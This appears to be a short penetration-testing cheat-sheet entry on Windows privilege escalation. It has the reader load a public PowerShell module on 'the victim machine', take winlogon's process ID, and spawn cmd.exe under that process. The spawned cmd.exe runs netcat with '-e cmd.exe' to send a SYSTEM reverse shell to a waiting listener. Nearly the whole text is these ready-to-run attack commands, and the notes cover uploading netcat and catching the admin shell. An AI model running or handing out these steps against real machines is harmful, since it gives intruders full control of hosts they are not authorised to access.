You can update update proc attribute list with this privilege and can elevate privileges. Use the module below to do that.
Module:
https://github.com/decoder-it/psgetsystem/blob/master/psgetsys.ps1
Get the above ps1 on the victim machine. Then run:
import-module .\psgetsys.ps1
Find pid of a process that is privileged.
Get-Process winlogon
Use that pid to attach & execute commands.
[MyProcess]::CreateProcessFromParent("552","c:\windows\system32\cmd.exe", "/c c:\windows\temp\nc.exe 127.0.0.1 4444 -e cmd.exe")
Note:
1. Make sure to have netcat uploaded to the specified file path in the above command.
2. If you close the shell you have to do the whole process again to get another shell
3. Make sure you set up a nc listener to catch the admin shell.